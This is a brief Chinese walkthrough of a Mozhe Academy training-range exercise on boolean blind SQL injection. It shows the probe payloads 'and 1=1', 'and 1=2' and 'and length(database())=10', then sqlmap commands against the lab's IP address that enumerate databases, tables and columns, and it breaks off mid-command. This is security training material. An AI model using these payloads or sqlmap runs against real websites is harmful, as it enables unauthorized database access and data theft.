墨者学院—SQL注入漏洞测试(布尔盲注)
靶场地址:SQL注入漏洞测试(布尔盲注)_SQL注入_在线靶场_墨者学院_专注于网络安全人才培养
打开靶场
我们先判断注入点,通过and 1 = 1和and 1 = 2来判断
发现页面存在注入点,且是数字型注入,但是id不为1时则没有任何回显,那我们只能判定是布尔盲注。
构造语句来证明我的想法
and length(database())= 10
发现页面在数据库长度为10的条件下回显正常,那么就证明了该点确实是存在布尔盲注的,为了节约时间我们放到sqlmap去跑(也可以进行手注)
查询数据库名:
sqlmap -u "http://124.70.71.251:48086/new_list.php?id=1" --dbs
查询stormgroup数据下的表:
sqlmap -u "http://124.70.71.251:48086/new_list.php?id=1" -D stormgroup --tables
查看member下的列:
sqlmap
共有 0 条评论